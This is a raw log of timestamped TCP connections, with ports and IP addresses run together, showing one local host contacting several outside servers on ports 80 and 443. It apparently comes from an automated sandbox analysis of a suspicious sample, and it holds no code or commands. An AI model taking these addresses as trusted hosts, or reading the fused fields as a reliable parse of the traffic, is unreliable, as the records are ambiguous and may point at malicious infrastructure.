                                                                                                                                                                              Dec 11, 2024 09:26:08.535701990 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:08.756006002 CET804970454.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:08.756110907 CET804970454.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:08.756318092 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:08.756318092 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:08.877840996 CET804970454.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:09.269834042 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:09.390229940 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:09.390312910 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:09.390573978 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:09.390573978 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:09.511007071 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:09.511049986 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:09.952672005 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:09.952682972 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:09.952752113 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:09.952963114 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:10.017432928 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:10.017503023 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:10.073333979 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:10.382893085 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:10.503318071 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:10.507813931 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:10.574706078 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:10.574822903 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:10.695468903 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:10.695481062 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:11.482453108 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:11.482482910 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:11.482531071 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:11.482640028 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:11.604324102 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:12.058533907 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:12.180787086 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:12.181022882 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:12.181054115 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:12.181054115 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:12.301836967 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:12.301846981 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:12.597376108 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:12.597516060 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:12.597628117 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:12.625039101 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:13.102772951 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:26:13.223254919 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:13.223383904 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:26:13.223695993 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:26:13.344494104 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:13.539892912 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:13.540182114 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:13.540254116 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:13.542753935 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:13.665364027 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.117172956 CET4971080192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:26:14.238030910 CET804971044.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.238171101 CET4971080192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:26:14.238643885 CET4971080192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:26:14.238643885 CET4971080192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:26:14.359252930 CET804971044.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.359263897 CET804971044.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.493051052 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.497525930 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:26:14.617983103 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.903294086 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:14.947021961 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:26:15.087615013 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:15.087652922 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:15.087774038 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:15.093009949 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:15.093028069 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:15.337960005 CET804971044.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:15.338048935 CET804971044.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:15.338099957 CET4971080192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:26:15.338551998 CET4971080192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:26:15.459261894 CET804971044.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:15.920469046 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:16.041362047 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.041543007 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:16.042012930 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:16.042012930 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:16.162416935 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.162592888 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.311474085 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.311624050 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:16.317184925 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:16.317199945 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.317437887 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.368881941 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:16.371140957 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:16.415339947 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.759182930 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.759243965 CET44349711172.67.177.134192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:16.759310007 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:16.765834093 CET49711443192.168.2.5172.67.177.134
                                                                                                                                                                              Dec 11, 2024 09:26:17.188370943 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:17.228262901 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:17.338543892 CET4971380192.168.2.572.52.179.174
                                                                                                                                                                              Dec 11, 2024 09:26:17.459186077 CET804971372.52.179.174192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:17.459280968 CET4971380192.168.2.572.52.179.174
                                                                                                                                                                              Dec 11, 2024 09:26:17.465089083 CET4971380192.168.2.572.52.179.174
                                                                                                                                                                              Dec 11, 2024 09:26:17.585643053 CET804971372.52.179.174192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:20.718612909 CET804971372.52.179.174192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:20.759506941 CET4971380192.168.2.572.52.179.174
                                                                                                                                                                              Dec 11, 2024 09:26:21.129717112 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:21.250199080 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:21.250283003 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:21.250545979 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:21.371072054 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:21.864192009 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:26:21.986447096 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.270047903 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.321994066 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:26:22.412658930 CET49716443192.168.2.5149.154.167.220
                                                                                                                                                                              Dec 11, 2024 09:26:22.412688971 CET44349716149.154.167.220192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.412750006 CET49716443192.168.2.5149.154.167.220
                                                                                                                                                                              Dec 11, 2024 09:26:22.413194895 CET49716443192.168.2.5149.154.167.220
                                                                                                                                                                              Dec 11, 2024 09:26:22.413207054 CET44349716149.154.167.220192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.554306030 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.554636955 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.554718971 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.554822922 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.554830074 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.554857016 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.554863930 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.554886103 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.554914951 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.555110931 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.555118084 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.555124998 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.555130959 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.555155039 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.555205107 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.675265074 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.675343037 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.676187992 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.746599913 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.746676922 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.746788979 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.750765085 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.781728983 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:22.781763077 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:22.790818930 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:22.902136087 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:22.902328014 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:23.120907068 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:23.165766954 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:23.381673098 CET4971380192.168.2.572.52.179.174
                                                                                                                                                                              Dec 11, 2024 09:26:23.502516031 CET804971372.52.179.174192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:23.797808886 CET44349716149.154.167.220192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:23.797880888 CET49716443192.168.2.5149.154.167.220
                                                                                                                                                                              Dec 11, 2024 09:26:23.799653053 CET49716443192.168.2.5149.154.167.220
                                                                                                                                                                              Dec 11, 2024 09:26:23.799664974 CET44349716149.154.167.220192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:23.799894094 CET44349716149.154.167.220192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:23.801575899 CET49716443192.168.2.5149.154.167.220
                                                                                                                                                                              Dec 11, 2024 09:26:23.847337008 CET44349716149.154.167.220192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:23.847867012 CET49716443192.168.2.5149.154.167.220
                                                                                                                                                                              Dec 11, 2024 09:26:23.847878933 CET44349716149.154.167.220192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:24.482908010 CET44349716149.154.167.220192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:24.483027935 CET44349716149.154.167.220192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:24.483098984 CET49716443192.168.2.5149.154.167.220
                                                                                                                                                                              Dec 11, 2024 09:26:24.483601093 CET49716443192.168.2.5149.154.167.220
                                                                                                                                                                              Dec 11, 2024 09:26:24.547502995 CET804971372.52.179.174192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:24.551563978 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:24.587655067 CET4971380192.168.2.572.52.179.174
                                                                                                                                                                              Dec 11, 2024 09:26:24.671993017 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.057082891 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.059555054 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.059695959 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:25.059731960 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.066915035 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.067003012 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.067065954 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:25.072541952 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.072613001 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:25.072655916 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.080888987 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.080950975 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:25.081105947 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.089584112 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.089601994 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.089658022 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:25.097898006 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.097915888 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.097940922 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:25.106230021 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.106287003 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:25.106328011 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:25.150152922 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:26:26.403898954 CET4973180192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:26.524322987 CET804973118.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:26.524749994 CET4973180192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:26.524910927 CET4973180192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:26.524929047 CET4973180192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:26.645404100 CET804973118.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:26.645608902 CET804973118.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:28.610888004 CET804973118.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:28.611031055 CET4973180192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:28.611047029 CET804973118.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:28.611201048 CET4973180192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:28.731525898 CET804973118.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:30.326698065 CET4974280192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:26:30.447257042 CET804974282.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:30.447329998 CET4974280192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:26:30.448394060 CET4974280192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:26:30.448440075 CET4974280192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:26:30.569025993 CET804974282.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:30.569037914 CET804974282.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:52.366547108 CET804974282.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:52.366647005 CET4974280192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:26:52.643193960 CET4974280192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:26:52.758130074 CET4979280192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:26:52.763591051 CET804974282.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:52.878750086 CET804979282.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:52.879024982 CET4979280192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:26:52.879203081 CET4979280192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:26:52.879223108 CET4979280192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:26:52.999702930 CET804979282.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:52.999749899 CET804979282.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:53.147124052 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:53.147182941 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:53.147264004 CET4971280192.168.2.5172.234.222.138
                                                                                                                                                                              Dec 11, 2024 09:26:53.267859936 CET8049712172.234.222.138192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:14.774194002 CET804979282.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:14.774279118 CET4979280192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:27:14.774318933 CET4979280192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:27:14.895795107 CET804979282.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:15.959341049 CET4984480192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:27:16.080399990 CET804984482.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:16.080543995 CET4984480192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:27:16.080837011 CET4984480192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:27:16.080857038 CET4984480192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:27:16.201431036 CET804984482.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:16.201459885 CET804984482.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:27.269644976 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:27.269848108 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:27:29.580167055 CET804971372.52.179.174192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:29.580226898 CET4971380192.168.2.572.52.179.174
                                                                                                                                                                              Dec 11, 2024 09:27:29.580312014 CET4971380192.168.2.572.52.179.174
                                                                                                                                                                              Dec 11, 2024 09:27:29.700738907 CET804971372.52.179.174192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:37.991838932 CET804984482.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:37.991908073 CET4984480192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:27:37.992031097 CET4984480192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:27:37.993707895 CET4989580192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:27:38.112435102 CET804984482.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:38.114173889 CET804989582.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:38.114248037 CET4989580192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:27:38.123414993 CET4989580192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:27:38.132839918 CET4989580192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:27:38.243844032 CET804989582.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:38.253349066 CET804989582.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:56.775567055 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:27:56.896222115 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:57.308368921 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:27:57.429297924 CET804971513.248.148.254192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:27:57.429371119 CET4971580192.168.2.513.248.148.254
                                                                                                                                                                              Dec 11, 2024 09:28:00.023873091 CET804989582.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:00.023942947 CET4989580192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:28:00.024024010 CET4989580192.168.2.582.112.184.197
                                                                                                                                                                              Dec 11, 2024 09:28:00.144515038 CET804989582.112.184.197192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:00.587630987 CET4994680192.168.2.547.129.31.212
                                                                                                                                                                              Dec 11, 2024 09:28:00.709594965 CET804994647.129.31.212192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:00.709711075 CET4994680192.168.2.547.129.31.212
                                                                                                                                                                              Dec 11, 2024 09:28:00.709965944 CET4994680192.168.2.547.129.31.212
                                                                                                                                                                              Dec 11, 2024 09:28:00.709983110 CET4994680192.168.2.547.129.31.212
                                                                                                                                                                              Dec 11, 2024 09:28:00.830755949 CET804994647.129.31.212192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:00.830812931 CET804994647.129.31.212192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:02.771852016 CET804994647.129.31.212192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:02.771943092 CET804994647.129.31.212192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:02.772010088 CET4994680192.168.2.547.129.31.212
                                                                                                                                                                              Dec 11, 2024 09:28:02.772134066 CET4994680192.168.2.547.129.31.212
                                                                                                                                                                              Dec 11, 2024 09:28:02.892688990 CET804994647.129.31.212192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:04.251483917 CET4995280192.168.2.513.251.16.150
                                                                                                                                                                              Dec 11, 2024 09:28:04.372040987 CET804995213.251.16.150192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:04.372121096 CET4995280192.168.2.513.251.16.150
                                                                                                                                                                              Dec 11, 2024 09:28:04.372708082 CET4995280192.168.2.513.251.16.150
                                                                                                                                                                              Dec 11, 2024 09:28:04.372839928 CET4995280192.168.2.513.251.16.150
                                                                                                                                                                              Dec 11, 2024 09:28:04.493273973 CET804995213.251.16.150192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:04.493294954 CET804995213.251.16.150192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:06.443178892 CET804995213.251.16.150192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:06.443192959 CET804995213.251.16.150192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:06.443274975 CET4995280192.168.2.513.251.16.150
                                                                                                                                                                              Dec 11, 2024 09:28:06.445017099 CET4995280192.168.2.513.251.16.150
                                                                                                                                                                              Dec 11, 2024 09:28:06.685071945 CET804995213.251.16.150192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:07.087305069 CET4996380192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:28:07.207947016 CET804996344.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:07.209481001 CET4996380192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:28:07.209919930 CET4996380192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:28:07.209964037 CET4996380192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:28:07.330540895 CET804996344.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:07.330554008 CET804996344.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:08.309787989 CET804996344.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:08.309895992 CET804996344.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:08.310007095 CET4996380192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:28:08.323252916 CET4996380192.168.2.544.221.84.105
                                                                                                                                                                              Dec 11, 2024 09:28:08.443747997 CET804996344.221.84.105192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:09.147567987 CET4996480192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:28:09.269741058 CET804996418.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:28:09.270920992 CET4996480192.168.2.518.141.10.107
